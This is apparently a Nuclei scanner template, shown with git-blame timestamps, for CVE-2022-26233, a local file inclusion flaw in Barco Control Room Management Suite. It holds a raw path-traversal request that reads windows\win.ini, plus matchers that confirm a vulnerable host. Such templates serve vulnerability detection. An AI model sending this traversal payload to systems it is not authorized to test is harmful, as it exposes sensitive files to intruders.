2022-05-05 01:55:44 +00:00
id : CVE-2022-26233
info :
2022-07-26 13:45:11 +00:00
name : Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
2022-05-05 01:55:44 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
2022-05-05 01:55:44 +00:00
reference :
- https://0day.today/exploit/37579
- https://www.cvedetails.com/cve/CVE-2022-26233
2022-05-17 09:18:12 +00:00
- http://seclists.org/fulldisclosure/2022/Apr/0
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
2022-05-05 01:55:44 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-05 01:55:44 +00:00
cvss-score : 7.5
cve-id : CVE-2022-26233
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,barco,lfi,seclists,packetstorm
2022-05-05 01:55:44 +00:00
requests :
2022-05-07 10:18:02 +00:00
- raw :
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host : {{Hostname}}
2022-05-05 01:55:44 +00:00
2022-05-07 10:18:02 +00:00
unsafe : true
2022-05-05 01:55:44 +00:00
matchers :
- type : word
part : body
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/15
